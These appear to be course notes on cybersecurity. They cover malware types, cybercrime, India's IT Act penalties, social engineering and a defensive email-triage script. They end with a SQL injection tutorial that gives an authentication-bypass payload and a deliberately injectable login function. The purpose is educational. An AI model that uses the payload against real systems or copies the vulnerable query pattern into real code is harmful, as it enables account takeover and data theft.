Cyber Security

The document provides an overview of cybersecurity, detailing its purpose of protecting systems and data from cyber threats, as well as defining cybercrime and its various forms, including hacking and malware. It explains the types of malware, such as viruses, worms, and Trojans, and discusses the importance of cybersecurity laws, particularly the Information Technology Act of 2000 in India. Additionally, it highlights the advantages and disadvantages of detecting and removing malware, emphasizing the need for awareness and preventive measures against cyber threats.

Uploaded by Ambika cs

Cybersecurity is the practice of protecting systems, networks, devices, and data from cyber threats, such as hacking, data breaches, malware, and other malicious attacks.

It involves a combination of technologies, processes, and measures designed to safeguard digital assets from unauthorized access, exploitation, or damage.

Cyber crime

A cybercrime is any criminal activity that involves a computer, network, or digital device as
either the target or the means for committing the offense.

Essentially, it refers to crimes that are facilitated or carried out using technology.

These crimes can affect individuals, businesses, governments, or society at large, and they
often involve the unauthorized access, theft, or damage of digital information or systems.

Key Characteristics of Cybercrime:

 Use of Technology: The crime is either committed with or against a computer or digital system.

 Illegal Actions: It typically involves illegal actions such as theft, fraud, identity theft,
data breaches, or even harassment.

 Impact on Data or Systems: The crime may disrupt, damage, or steal information,
disrupt services, or cause harm to a network or device.

Common Types of Cybercrime:

1. Hacking: Unauthorized access to computer systems to steal data or cause damage.

2. Phishing: Fraudulent attempts to gain sensitive information (e.g., passwords, credit card details) by posing as a trustworthy entity in electronic communications.

3. Ransomware: Malicious software that locks users out of their data or system and demands a ransom to restore access.

4. Identity Theft: Stealing someone's personal information to commit fraud or other crimes in their name.

5. Cyberbullying: Using digital platforms to intimidate, threaten, or harass others.

6. Malware Distribution: Creating or spreading malicious software like viruses, worms, or spyware that can harm or compromise data and systems.

7. Online Fraud: Activities like fake online shopping sites, investment scams, or deceptive services that cheat victims out of money.

8. DDoS Attacks (Distributed Denial of Service): Overloading a website or server with traffic, causing it to crash and become inaccessible.

9. Child Exploitation: Using the internet to exploit, harm, or abuse children, including the production or distribution of child pornography.

Examples of Cybercrime:

 A hacker breaching a company's database and stealing customer information.

 A scammer sending fake emails to trick people into giving away credit card details.

 A group using ransomware to lock a hospital's data and demanding payment to restore access.

What is Malware? And its Types

Malware (malicious software) refers to any software that is designed to cause harm to computer systems, networks, or users.

Malware is software that gets into the system without user consent to steal the user's private and confidential data, including bank details and passwords. It may also generate annoying pop-up ads and change system settings.

Malware includes computer viruses, worms, Trojan horses, ransomware, spyware, and
other malicious programs.

Individuals and organizations need to be aware of the different types of malware and take
steps to protect their systems, such as using antivirus software, keeping software and
systems up-to-date, and being cautious when opening email attachments or downloading
software from the internet.
Why Do Cybercriminals Use Malware?
 Cybercriminals use malware, including viruses and all other forms of malicious software, for various purposes, such as:
 Using deception to induce a victim to provide personal information for identity theft
 Theft of customer credit card information or other financial information
 Taking over several computers and using them to launch denial-of-service attacks against other networks

Advantages of Detecting and Removing Malware

 Improved Security: By detecting and removing malware, individuals and organizations can improve the security of their systems and reduce the risk of future infections.
 Prevent Data Loss: Malware can cause data loss, and by removing it, individuals and organizations can protect their important files and information.
 Protect Reputation: Malware can cause harm to a company's reputation, and by detecting and removing it, individuals and organizations can protect their image and brand.
 Increased Productivity: Malware can slow down systems and make them less efficient, and by removing it, individuals and organizations can increase the productivity of their systems and employees.

Disadvantages of Detecting and Removing Malware

 Time-Consuming: The process of detecting and removing malware can be time-
consuming and require specialized tools and expertise.
 Cost: Antivirus software and other tools required to detect and remove malware can be
expensive for individuals and organizations.
 False Positives: Malware detection and removal tools can sometimes result in false
positives, causing unnecessary alarm and inconvenience.
 Difficulty: Malware is constantly evolving, and the process of detecting and removing
it can be challenging and require specialized knowledge and expertise.
 Risk of Data Loss: Some malware removal tools can cause unintended harm, resulting
in data loss or system instability.
Types of Malware
 Worms - Worms replicate themselves on the system, attaching themselves to different files and looking for pathways between computers, such as a computer network that shares common file storage areas. Worms usually slow down networks. A virus needs a host program to run, but worms can run by themselves. After a worm infects a host, it is able to spread very quickly over the network.
 Trojan horse - A Trojan horse is malware that carries out malicious operations under the appearance of a desired operation, such as playing an online game. A Trojan horse differs from a virus in that the Trojan binds itself to non-executable files, such as image files and audio files.
Adware

Adware is a type of malware (malicious software) that automatically displays or downloads unwanted advertisements on a user's computer or mobile device, often without the user's permission. Its main goal is to generate revenue for the developer by showing ads.

 It comes along with software downloads and packages.
 Shows pop-up ads, banner ads, or redirects to advertising websites.
 Often comes bundled with free software.
 May track user behavior (like browsing history) to show targeted ads.
 Can slow down system performance and compromise privacy.

Here are five ways in which adware negatively affects systems:

1. Performance Degradation: High CPU or memory consumed by advertisements when loading or rendering.
2. Privacy Loss: Gathering browsing history for advertising or potential unauthorized use.
3. Excessive Consumption of Bandwidth: Frequent data retrieval for ads can result in increased monthly usage and slow networks.
4. Pop-up Ad Interference: Frequent interruptions in the form of new ad windows disrupt working efficiency and increase user irritation.
5. Increased Security Risks: Redirects to malicious domains or forced installation of additional harmful software.
How Do You Get Adware?

1. Bundled Apps: Some adware is hidden inside otherwise genuine app installers.
2. Phishing Links: Emails or ads that contain links to other sites with hidden adware modules.
3. Trojanized Mobile Apps: Free games or utilities with embedded ad-serving libraries.
4. Browser Hijackers: Extensions or plug-ins that silently modify various configuration files.
5. Infected USB Drives: These install adware executables when inserted into unprotected computers.

Spyware
 Spyware is a breach of cyber security, as it usually gets into the laptop/computer system when a user unintentionally clicks on a random unknown link or opens an unknown attachment, which downloads the spyware alongside the attachment.
Spyware enters the laptop/computer system in the following ways:
 Phishing: A form of security breach where spyware enters the system when a suspicious link is clicked or an unknown dangerous attachment is downloaded.
 Spoofing: This goes alongside phishing and makes unauthorized emails appear to come from legitimate users or business units.
 Free Software or Shared Software: Spyware gets into the system when a user installs software that is free of cost but has spyware bundled with it.
 Misleading software: This is advertised as very beneficial for the system, e.g. boosting its speed, but it leads to the theft of confidential information from the system.
Types of spyware
Here are some common types:
 Keyloggers: These record the keystrokes typed by the user, and so can capture passwords and other sensitive messages.
 Adware: Though not always malicious, adware displays unwanted advertisements and tracks your Internet activity to serve targeted advertisements.
 Trojans: These are rogue programs that disguise themselves as genuine applications, but in reality they contain spyware that spies on the user or steals information.
 Tracking Cookies: These are small data files that the sites you visit create in your browser to keep track of your browsing history and preferences. They are used for advertising, since they reveal what kind of content the user prefers.
 System Monitors: These record the user's online activity and use of the system for malicious purposes.
 Data Harvesters: These are intended to capture and transfer messages or data, which may include personal identity details, log-in data, or even credit card numbers.
 Browser hijackers: These make changes to your browser, such as the home page or search page, and can redirect you to sites that contain malware.
 Remote Access Trojans (RATs): These grant attackers full remote control of your device without being noticed, including access to all files, among other things.

Computer Virus
 A computer virus is a type of malicious software program ("malware") that,
when executed, replicates itself by modifying other computer
programs and inserting its code.
 When this replication succeeds, the affected areas are then said to be "infected".
 Viruses can spread to other computers and files when the software or documents
they are attached to are transferred from one computer to another using
a network, a disk, file-sharing methods, or through infected email attachments.
 A virus can harm or destroy data, slow down system resources, and log
keystrokes, among other things.
 A virus can have unexpected or harmful outcomes during this procedure, such
as destroying system software by corrupting data.
 Some viruses are made to mess things up by deleting files, messing up
programs, or even wiping out your hard drive completely.
 Even if they're not super harmful, viruses can still slow down your computer a
lot, using up memory and making it crash often.
How to Prevent Your Computer From Viruses?
1. Install Antivirus Software
2. Update Regularly
3. Be Cautious with Emails and Downloads
4. Use Strong Passwords
5. Backup Your Data
Computer Worm
 A computer worm is a type of harmful software that copies itself and spreads from one computer to another without requiring any user intervention.
 It is like a sickness that can move through a network of computers, searching for weaknesses to infect.
 Worms often spread through email attachments that may seem safe but can actually cause a lot of trouble.
 Once a computer is infected, the worm can send itself to the person's contacts using their email account. This way, it keeps spreading to more and more computers.
How To Prevent Computer Worm Infections?
1. Keep your software updated and use strong passwords.
2. Enable and properly configure firewalls on your computer and network devices.
3. Be cautious when dealing with email attachments and links.
4. Practice safe web browsing by avoiding clicking on suspicious advertisements or pop-up windows.
5. Install and keep updated reliable antivirus or anti-malware software.
Types of Computer Worms
 Email Worms: Email worms spread through email attachments or links.
 Network Worms: Network worms move through computer networks by exploiting security weaknesses in network services or protocols.
 File-Sharing Worms: File-sharing worms target shared folders or peer-to-peer file-sharing networks.
 Instant Messaging (IM) Worms: IM worms spread through instant messaging platforms. They send infected links or files to a person's contacts. By tricking users into clicking on these links, they can infect more systems.
 Internet Worms: Internet worms target vulnerabilities in websites, web servers, or web applications. They can infect computers when people visit compromised websites or interact with infected web content.
Trojan Horse
A Trojan horse is malicious code that has the capacity to take control of the computer. It is designed to steal, damage, or perform other harmful actions on the computer. It tries to deceive the user into loading and executing the file on the device. Once it executes, it allows attackers to perform actions on the user's computer such as deleting data from files, modifying data in files, and more. Unlike viruses and worms, a Trojan horse does not have the ability to replicate itself.
Features of a Trojan Horse
 Steals Information: Trojan horses are often designed to steal sensitive information
such as passwords, banking details, and other personal data stored on the victim's
computer.
 Remote Access: A Trojan horse can grant remote access to an attacker, allowing them
to control the infected system and perform actions without the user's knowledge or
consent.
 Data Deletion: Some Trojan horses are capable of deleting or corrupting data on the
user's computer, causing data loss or system instability.

Types of Trojan Horse

 Backdoor trojan: gives the attacker remote access to the compromised machine.
 Ransom trojan: encrypts the data on the compromised system and then demands payment in exchange for its decryption.
 Trojan Banker: steals account data for online banking, credit and debit cards, etc.
Cyber Laws

Cyber Law is the area of law that deals with the legal issues related to the use of the internet,
digital communications, and information technology. It is also known as Internet Law or
IT Law.

Cyber law refers to the set of rules and regulations that govern online behavior, the internet,
and digital interactions, including the protection of data, privacy, intellectual property, and
prevention of cybercrimes.

Advantages of Cyber Law

Protection Against Cybercrimes: It prescribes penalties for various cybercrimes.

Data Privacy: These regulations ensure that organizations handle personal data responsibly.

E-commerce Regulation: It defines rules for online transactions, contracts, and consumer protection, thereby fostering a fair and secure online marketplace.

Intellectual Property Protection: It prevents the unauthorized use and distribution of digital content.

Cybersecurity Standards: It requires organizations to implement measures for the protection of their networks and systems.

Information Technology Act, 2000 (IT Act)

 The IT Act, 2000 is the first cyber law in India.
 It was passed to regulate digital transactions, cybercrimes, and e-commerce.
 Enacted on 17 October 2000.
 Information Technology Act, 2000 (IT Act): the main cyber law in India, which:
o Legalizes digital signatures and e-documents.
o Penalizes cybercrimes like hacking, identity theft, and online fraud.
o Establishes legal procedures for electronic evidence.
 The Information Technology Act of 2000, also known as the IT Act, is the primary legislation in India that deals with cybercrime and e-commerce. The act was implemented on October 17, 2000, to provide legal recognition for electronic documents and facilitate e-governance.
 It consists of various sections and clauses addressing different forms of cyber offenses such as hacking, data theft, online fraud, virus attacks, identity theft, and cybersecurity breaches.
 Under the IT Act of 2000, individuals found guilty of unauthorized access to computer systems can face imprisonment for up to two years or a fine extending up to one lakh rupees. Moreover, Section 66C provides punishment for identity theft with imprisonment which may extend to three years, or a fine not exceeding two lakh rupees, or both.
 In addition to these provisions, Section 43A imposes penalties on companies that fail to protect sensitive personal data from being disclosed without consent. Under this section, non-compliance can result in significant compensation claims by those affected by data leaks caused by negligence on the part of the company concerned.

Penalties for different cybercrimes

In India, penalties for cybercrimes are outlined under various sections of the Information Technology Act of 2000. The Act specifies fines, imprisonment, or both, depending on the severity and nature of the cybercrime committed.

Section | Provision | Description
Section 43 | Penalty for unauthorized access | If someone accesses a computer or data without permission, they have to pay compensation.
Section 66 | Hacking | Punishment for hacking into a system: up to 3 years in jail or a fine.
Section 66C | Identity Theft | Using someone else's password or digital signature is punishable.
Section 66D | Cheating by Personation | Online frauds like phishing or fake emails.
Section 67 | Publishing obscene material | Punishment for sending or posting vulgar content online.
Section 72 | Breach of confidentiality | If any person leaks sensitive data from a computer without consent.
Cyber security and Punishment
Key Provisions and Punishments Under the IT Act
The IT Act outlines various offenses and their respective penalties:

1. Unauthorized Access (Section 43)
o Offense: Unauthorized access to a computer, computer system, or network.
o Punishment: Compensation to the affected party, which can go up to ₹1 crore.
2. Hacking (Section 66)
o Offense: Dishonestly or fraudulently accessing a computer
resource.
o Punishment: Imprisonment up to three years and/or a fine up to ₹5
lakh.
3. Identity Theft (Section 66C)
o Offense: Using someone else’s password or digital signature
without authorization.
o Punishment: Imprisonment up to three years and/or a fine up to ₹1
lakh.
4. Cheating by Personation Using Computer Resource (Section 66D)
o Offense: Cheating by pretending to be someone else using a
computer resource.
o Punishment: Imprisonment up to three years and/or a fine up to ₹1
lakh.
5. Cyber Terrorism (Section 66F)
o Offense: Acts that threaten the integrity, sovereignty, or security of
India using cyber means.
o Punishment: Imprisonment for life.
6. Publishing Obscene Material (Section 67)
o Offense: Publishing or transmitting obscene material in electronic
form.
o Punishment: First-time offenders face imprisonment up to three
years and a fine up to ₹5 lakh; subsequent convictions lead to
imprisonment up to five years and a fine up to ₹10 lakh.
7. Child Pornography (Section 67B)
o Offense: Publishing or transmitting child pornography in electronic
form.
o Punishment: First-time offenders face imprisonment up to five
years and a fine up to ₹10 lakh; subsequent convictions lead to
imprisonment up to seven years and a fine up to ₹10 lakh.
8. Breach of Confidentiality and Privacy (Section 72)
o Offense: Unauthorized disclosure of information without consent.
o Punishment: Imprisonment up to two years and/or a fine up to ₹1
lakh.

Relevant Indian Penal Code Sections

Certain cybercrimes are also punishable under the IPC:

1. Forgery (Section 463)
o Offense: Creation of fake documents or electronic records.
o Punishment: Imprisonment up to two years, or a fine, or both.
2. Criminal Intimidation (Section 506)
o Offense: Threatening someone with injury to person, reputation, or
property.
o Punishment: Imprisonment up to two years, or with fine, or both. If
the threat is to cause death or grievous hurt, the punishment can
extend to seven years.
3. Defamation (Section 499)
o Offense: Making false statements that harm someone’s reputation.
o Punishment: Imprisonment up to two years, or with fine, or both.
Regulations and Laws:

🔹 1. Information Technology Act, 2000 (IT Act)
 Purpose: First law to provide legal recognition for e-commerce and to address cybercrime.
 Key Areas:
o Legal recognition of electronic records and digital signatures.
o Penalties for cybercrimes (e.g., hacking, phishing, data theft).
o Defines cyber offences and prescribes punishment.
o Establishes CERT-In (Indian Computer Emergency Response Team) under Section 70B for incident response.

🔹 2. IT (Amendment) Act, 2008

 Why amended: To handle growing cyber threats and add data protection elements.
 Major Additions:
o Introduced terms like cyber terrorism, identity theft, and phishing.
o Strengthened legal enforcement mechanisms.
o Empowered the government to block websites and monitor communications.

🔹 3. Digital Personal Data Protection (DPDP) Act, 2023

 Focus: Protect digital personal data and regulate its processing.
 Key Concepts:
o Data Principal: The individual whose data is collected.
o Data Fiduciary: Entity that processes the data.
 Rights of Individuals:
o Right to consent, access, correction, and erasure of personal data.
o Right to grievance redressal.
 Enforcement: Through the Data Protection Board of India.

🔹 4. National Cyber Security Policy, 2013

 Vision: Create a secure cyber ecosystem in the country.
 Objectives:
o Protect critical information infrastructure (CII).
o Develop cyber security skills.
o Encourage public-private partnerships.
o Promote awareness and research in cyber technologies.

🔹 5. National Cyber Security Strategy, 2020

Prepared by: National Security Council Secretariat (NSCS).
 Goals:
o Strengthen cyber governance.
o Protect digital infrastructure and build response capabilities.
o Promote indigenous cyber products.
 Status: Awaiting official release/implementation.

🔹 6. IT (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021

 Applicability:
o Social media platforms (e.g., WhatsApp, Twitter).
o OTT platforms (e.g., Netflix, Amazon Prime).
o Digital news media.
 Key Requirements:
o Appointment of grievance officer and compliance officer.
o Monthly compliance reports.
o Traceability of message originators.
o Classification and regulation of OTT content.

🔹 7. National Cyber Security Reference Framework (NCRF) 2023

 Purpose: To help government and private organizations strengthen cyber defenses.
 Features:
o Provides guidelines for designing secure IT systems.
o Includes reference architectures, compliance models, and best practices.
o Promotes risk assessment and response planning.

🔹 8. CERT-In (Indian Computer Emergency Response Team)

 Established: Under Section 70B of IT Act.
 Role:
o Acts as the nodal agency for cyber incident response.
o Issues advisories, guidelines, vulnerability notes.
o Mandates reporting of breaches within 6 hours (as of 2022).
o Conducts audits and awareness programs.

🔹 9. NCSC (National Cyber Security Centre)

 Objective: Strengthen coordination on cyber threats at the national level.
 Functions:
o Coordinate among ministries, CERT-In, law enforcement, and private players.
o Develop response mechanisms for national-level cyber attacks.

🔹 10. SEBI (Securities and Exchange Board of India)

 Responsibility: Regulates the securities market.
 Cybersecurity Role:
o Mandates regular cyber audits for stock exchanges, brokers, and depositories.
o Enforces guidelines on data protection, incident response, and risk mitigation.

🔹 11. IRDAI (Insurance Regulatory and Development Authority of India)

 Responsibility: Regulates the insurance sector.
 Cybersecurity Measures:
o Issued guidelines for insurers to implement cyber security frameworks.
o Promotes cyber insurance policies.
o Mandates reporting of cyber incidents.

🔹 12. Cybercrime Reporting Platform (I4C/NCRP)

 Operated by: Indian Cyber Crime Coordination Centre (I4C).
 Platform: https://cybercrime.gov.in
 Purpose:
o Allows public to report cybercrimes like financial frauds, social media abuse,
cyberbullying, etc.
o Separate portal for law enforcement to investigate cases.
o Supports both anonymous and official reporting.

Regulation/Body | Focus Area
IT Act, 2000 | Legal framework for electronic transactions & cybercrime
IT Amendment, 2008 | Expanded coverage for new-age cyber threats
DPDP Act, 2023 | Protecting digital personal data
NCSP 2013 | National cyber security policy framework
Cyber Strategy 2020 | Future vision for cyber defense
Intermediary Rules 2021 | Governs digital content, social media & OTT
NCRF 2023 | Standard cyber framework for organisations
CERT-In | Incident handling & awareness
NCSC | National-level coordination
SEBI & IRDAI | Sector-specific cyber compliance
I4C | Public platform to report cybercrimes


Unit II : Methods of Malware Attacks

In the section above, we identified the various types of malware along with the methods by which they spread. The ways that malware can infiltrate and spread through networks continue to expand along with the threat vectors in the digital landscape, including the following:

 Unsecure devices that access the network, such as personal mobile devices, PCs, and IoT devices, open an attack vector for malware.
 Unsecure networks that are part of a supply chain, or unsecure third-party partners' networks, can infect the networks of other suppliers or give malware access to the enterprise network.
 Older devices on the network with software that is not routinely updated can become compromised and spread malware.
 Email attachments containing malicious code can be opened and forwarded to other users, spreading the malware across the enterprise.
 Phishing or spear phishing emails trick the recipient into sharing passwords that give access to the corporate network, where malware can spread.
 Smishing texts, similar to phishing emails but on mobile phones, trick distracted users into clicking on malware links and entering personal or business credentials that enable malware to spread on the network.
 File servers, such as those based on the Common Internet File System or Network File System, can spread malware as users download infected files.
 File-sharing software can allow malware to replicate itself onto removable media such as thumb drives and then on to computer systems and networks.
 Peer-to-peer (P2P) file sharing can introduce malware through infected files that look as harmless as video, music, or images.
 Remotely exploitable network vulnerabilities can enable an attacker to access systems regardless of geographic location.
Social Engineering attacks

Social engineering refers to a wide range of attacks that leverage human interaction and
emotions to manipulate the target. During the attack, the victim is fooled into giving away
sensitive information or compromising security.

A social engineering attack typically takes multiple steps. The attacker will research the
potential victim, gathering information about them and how they can use them to bypass
security protocols or get information. Then the attacker does something to gain the target’s
trust before finally manipulating them into divulging sensitive information or violating
security policies.
Traits of a Social Engineering Attack
 Heightened emotions: An attacker threatens the loss of an account to trick users into providing their credentials, or the attacker might pretend to be an executive demanding money from a targeted user to instill a sense of urgency in an employee fearful of losing their job.
 Spoofed sender address: Most users are unaware that a sender email address can be spoofed, but proper email security will stop spoofed senders from reaching a targeted user's inbox. Instead, an attacker will register a domain similar to an official one and hope that the targeted user does not notice the misspelling.
 Strange friend requests: It is not uncommon for an attacker to compromise an email account and spam malicious messages to the victim's contact list. Such messages are usually short and lack the personalized element of messages from friends, so be hesitant to click links from friends if the message does not sound like personal communication.
 Unprofessional website links: Phishing links are sometimes used with social engineering to trick users into divulging sensitive information. Never enter credentials into a website reached directly from an email link, even if it looks like an official site (e.g., PayPal).
 Too good to be true: Scammers often promise money or prizes in exchange for a small upfront payment. For example, a targeted user could be offered a free iPhone in exchange for paying the shipping. If the offer is too good to be true, it is probably a scam.
 Suspicious attachments: Instead of tricking targeted users into divulging private information, a sophisticated attack might work towards installing malware on a corporate machine using email attachments. Never run macros or executables on a machine from a seemingly harmless email message.
 Questionable sender: Many social engineering techniques are designed to mimic a familiar source, such as a friend, boss, or co-worker. If you receive a suspicious email message, always ask yourself "did my boss/friend/co-worker actually send this to me?" Before responding to the email in question, contact the actual person via phone call, text, or social media message to verify whether they are being impersonated.
 Refusal to respond to questions: If a message seems suspicious, reply to the message and ask the sender to identify themselves. An attacker will avoid identifying themselves and might simply ignore the request.
 Unidentifiable sender: If the sender is unable or unwilling to verify their identity with the organization, do not provide any additional information or access that they are requesting. While email messages are the most common, this applies to other social engineering tactics as well, such as text messages and phone calls.
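The traits above (look-alike sender domain, executive impersonation, urgency language, credential links, risky attachments) can be turned into a mail-triage check. This is an added example, not code from the original notes; the trusted domains, executive names, keyword list and sample messages are constructed for illustration and would be replaced with an organisation's own values.

```python
"""Heuristic triage of an inbound message against common social-engineering traits.

Added example, not part of the original notes. TRUSTED_DOMAINS, EXECUTIVES,
URGENCY_WORDS and the sample messages are constructed placeholders.
"""
from dataclasses import dataclass
from email.utils import parseaddr
from typing import Optional
import re

TRUSTED_DOMAINS = {"example.com", "paypal.com"}      # constructed allow-list of genuine domains
EXECUTIVES = {"priya sharma", "rahul mehta"}         # constructed names of executives
URGENCY_WORDS = ("urgent", "immediately", "suspended",
                 "within 24 hours", "account will be closed")
RISKY_EXTENSIONS = (".exe", ".scr", ".js", ".vbs", ".docm", ".xlsm")
# Character tricks that make a look-alike domain read like the real one.
HOMOGLYPH_PAIRS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"),
                   ("3", "e"), ("5", "s"), ("|", "l"))


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize(host: str) -> str:
    """Fold homoglyph substitutions so 'examp1e.com' compares as 'example.com'."""
    host = host.lower()
    for fake, real in HOMOGLYPH_PAIRS:
        host = host.replace(fake, real)
    return host


def lookalike_of(host: str) -> Optional[str]:
    """Return the trusted domain that `host` imitates, or None.

    A genuine trusted domain (or one of its subdomains) is never flagged.
    Flagged: homoglyph spellings, a registrable label within edit distance 2
    of the trusted label, and a trusted name embedded in a foreign domain
    (e.g. paypal.com.evil.net or paypal-security.com).
    """
    host = host.lower().split(":")[0]                 # drop any port
    for trusted in TRUSTED_DOMAINS:
        if host == trusted or host.endswith("." + trusted):
            return None
    norm = normalize(host)
    labels = norm.split(".")
    registrable_label = labels[-2] if len(labels) >= 2 else norm
    for trusted in TRUSTED_DOMAINS:
        t_label = trusted.split(".")[0]
        if (norm == trusted or t_label in norm
                or levenshtein(registrable_label, t_label) <= 2):
            return trusted
    return None


@dataclass
class Verdict:
    score: int
    reasons: list


def triage(sender: str, subject: str, body: str, attachments=()) -> Verdict:
    """Score one message: each matched trait adds one reason; 0 means nothing matched."""
    reasons = []
    name, addr = parseaddr(sender)
    domain = addr.rpartition("@")[2].lower()
    if not domain:
        reasons.append("sender has no usable address")
    imitated = lookalike_of(domain) if domain else None
    if imitated:
        reasons.append(f"sender domain {domain} imitates {imitated}")
    # CEO-fraud check: an executive's display name on an address outside the organisation.
    if name.strip().lower() in EXECUTIVES and domain not in TRUSTED_DOMAINS:
        reasons.append(f"display name '{name}' matches an executive but domain {domain} is external")
    text = f"{subject} {body}".lower()
    hits = [w for w in URGENCY_WORDS if w in text]
    if hits:
        reasons.append("urgency language: " + ", ".join(hits))
    # Links whose host imitates a trusted site (credentials should never be entered via an email link).
    for host in re.findall(r"https?://([^/\s]+)", body, flags=re.I):
        imitated = lookalike_of(host)
        if imitated:
            reasons.append(f"link host {host.lower()} imitates {imitated}")
    for filename in attachments:
        if filename.lower().endswith(RISKY_EXTENSIONS):
            reasons.append(f"executable or macro-enabled attachment: {filename}")
    return Verdict(score=len(reasons), reasons=reasons)


if __name__ == "__main__":
    # Constructed sample: CEO-fraud style message with a look-alike domain and a macro document.
    verdict = triage("Priya Sharma <priya.sharma@examp1e.com>",
                     "Urgent wire transfer",
                     "Pay immediately or the account will be suspended. "
                     "Confirm at http://paypai.com/login",
                     ["invoice.docm"])
    for reason in verdict.reasons:
        print("-", reason)
```

The score is only a triage signal for a human reviewer or a mail-filter rule; a zero score does not prove a message is genuine.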

The overall technique used in social engineering is using emotions to trick
users, but attackers use several standard methods to push the user into
performing an action (e.g., sending money to a bank account) and making the
attack look more legitimate. Usually, the techniques involve email or text
messages, because they can be used without voice conversations.

A few common examples of social engineering techniques include:

 Phishing: Fraudulent emails or websites that impersonate a trusted party (a
bank, a vendor, a colleague) to harvest credentials or payment details. In one
common variant the attacker pretends to be a corporate executive to trick users
into sending money to an offshore bank account.
 Vishing and smishing: Attackers use text messages and voice-changing
software to send SMS messages or robo-call users. The messages usually
promise gifts or services in exchange for payment. These types of scams are
called vishing (voice phishing) and smishing (SMS phishing).
 CEO (executive) fraud: Users often feel urgency when an executive requests
action, so an attacker will pretend to be the CEO or another executive to instill a
sense of urgency for the targeted employee to perform an action. This is known
as CEO fraud.
 Baiting: The attacker dangles something the victim wants. Online this is usually
a prize or money offered in exchange for a small "shipping" or processing
payment, an offer that is too good to be true. In the physical world it is a
malware-loaded USB drive or similar device left where a curious employee will
pick it up and plug it in.
 Pretexting: Attackers may create a false pretext to gain sensitive information or
access to a system. For example, an attacker might impersonate a bank teller
and contact a target individual to claim that there’s been suspicious activity on
their account and ask them to share sensitive information to confirm their
account.
 Tailgating or piggybacking: Corporations use badge readers, turnstiles, or
security guards to block unauthorized access to the premises. An attacker
tailgates by following an authorized employee through a door before it closes,
or piggybacks by persuading the employee (hands full, "forgot my badge") to hold
the door or swipe their own access card, giving the attacker physical access to
the premises.
 Quid pro quo: The attacker offers something in return for information or
access. A common form is posing as IT support who will "fix" a problem if the
employee first shares their password; disgruntled employees may also be offered
money or other promises in exchange for sensitive information.
 Watering hole: This form of social engineering attack involves targeting certain
groups by infecting websites that the group is likely to visit. For example, an
attacker might infect a popular news site with malware with the intention that
employees of a certain company will visit the site and inadvertently download the
malware.
 Responding to a question never asked: The targeted victim will receive an
email “responding” to a question, but the response will ask for personal details,
contain a link to a malicious website, or include a malware attachment.
 Threaten loss of money or accounts, or threaten prosecution: Fear is a
useful tool in social engineering, so an effective way to trick users is to tell them
that they will suffer money loss or go to jail if they do not comply with the
attacker’s request.
Term           Description
Phishing       Fake emails or websites that steal credentials or other information
Vishing        Voice-call scams
Smishing       SMS-based phishing
Pretexting     A fabricated story or identity used to obtain data
Baiting        A tempting offer, or a malware-loaded device left for the victim
Tailgating     Unauthorized entry into secure areas behind an authorized person
Quid Pro Quo   A service or payment offered in trade for sensitive information

How to Prevent Social Engineering Attacks

 Think before you click — Don’t open suspicious emails or links.
 Verify identities — Confirm before sharing any sensitive info.
 Use strong passwords and enable multi-factor authentication.
 Educate and train users regularly.
 Update software to avoid exploits.
 Report suspicious activities immediately.

Web application attack

Web Application:

A web application is a software program that runs on a web server and is accessed through a
browser. Examples include:

 Online banking platforms
 E-commerce websites (like Amazon, Flipkart)
 Social media sites (like Facebook, Instagram)
 Online forms, login portals, feedback systems, etc.

A web application attack is any attempt to exploit weaknesses in a website or web-based
software to compromise its security: to gain unauthorized access, disrupt operations, or steal
sensitive data. These attacks target weaknesses in the application's code, its infrastructure,
or its interaction with users. Common examples include SQL injection, cross-site scripting
(XSS), and cross-site request forgery (CSRF).

Web application attacks are a major threat in today's digital world. Securing web applications
through best practices and continuous monitoring is essential to protect data and maintain trust.

SQL Injection (SQLi)

SQL Injection occurs when an attacker enters specially crafted text into an input field
(such as a login or search box) and the application pastes that text into a SQL statement.

Instead of the input being treated as plain data, it gets executed as SQL code. This can
expose or even modify the entire database.

Example Scenario:
A login form asks for a username and password, and the application builds its query by
string concatenation:

SELECT * FROM users WHERE username = '<username>' AND password = '<password>'

The attacker enters:

Username: ' OR '1'='1' --
Password: anything

The query becomes:

SELECT * FROM users WHERE username = '' OR '1'='1' -- ' AND password = 'anything'

The condition '1'='1' always evaluates to true and the -- comment discards the password
check, so the query matches every row. An application that logs in whichever user comes
back first hands the attacker the first account in the table, which is often the
administrator account created during setup. (The shorter payload ' OR '1'='1 entered in
both the username and the password field has the same effect, because the final OR makes
the whole WHERE clause true.)

 Consequences:
o Unauthorized access to user data
o Data loss or corruption
o Full control over the database
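The scenario above, as an added worked example that is not part of the original page: a vulnerable login that concatenates user input into SQL, beside the parameterised version, run against a constructed in-memory SQLite table. The table contents, the login functions and the PAYLOAD constant are all assumptions made for the demonstration.

```python
import sqlite3

# Constructed in-memory database standing in for the application's user table.
# Passwords are stored in clear text only to keep the injection demo short;
# a real application stores password hashes, never the passwords themselves.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
)
conn.executemany(
    "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
    [("admin", "s3cret-admin", "admin"), ("john", "hunter2", "user")],
)


def login_vulnerable(username: str, password: str):
    """Builds the query by string concatenation, so user input becomes SQL.

    Returns the (username, role) of the first matching row, or None.
    """
    sql = (
        "SELECT username, role FROM users WHERE username = '"
        + username
        + "' AND password = '"
        + password
        + "'"
    )
    return conn.execute(sql).fetchone()


def login_safe(username: str, password: str):
    """Parameterised query: the driver sends the values separately from the
    SQL text, so a quote or comment marker in the input is just data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# The page's payload: the quote closes the string, '1'='1' is always true,
# and the trailing comment marker discards the password clause.
PAYLOAD = "' OR '1'='1' -- "

if __name__ == "__main__":
    print("vulnerable:", login_vulnerable(PAYLOAD, "anything"))  # ('admin', 'admin')
    print("safe:      ", login_safe(PAYLOAD, "anything"))        # None
    print("legit:     ", login_safe("john", "hunter2"))          # ('john', 'user')
```

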